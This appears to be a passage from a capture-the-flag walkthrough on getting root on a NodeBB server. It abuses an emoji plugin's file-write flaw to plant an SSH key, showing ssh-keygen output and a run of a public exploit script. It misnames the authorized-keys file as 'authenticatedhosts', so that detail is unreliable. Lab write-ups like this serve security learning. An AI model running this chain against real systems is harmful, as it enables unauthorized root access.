If we have valid credentials for the NodeBB portal we could try to see if the portal is running this plugin that we could use to write on files.
There is multiple ways to get root here but the easieset is place an idRsa key into the authenticatedhosts file in the .ssh folder of the users.
ssh-keygen -t rsa -N '' -f ~/.ssh/id_rsa
Generating public/private rsa key pair.
Your identification has been saved in /home/kali/.ssh/id_rsa
Your public key has been saved in /home/kali/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:77ufSzZu/0b3gdzFwZOzihQewkazcg5T4qZ19is9l2M kali@kali
The key's randomart image is:
+---[RSA 3072]----+
| .o+ . .|
| . o+oo * |
| B.=o o .=|
| + O .o .o|
| . S...o + .|
| ....+.oo|
| ..++E .+|
| ..+=o. o|
| +==o.o.|
+----[SHA256]-----+
python3 /usr/share/exploitdb/exploits/multiple/webapps/49813.py
[+] Login successful
[+] Emoji plugin is installed
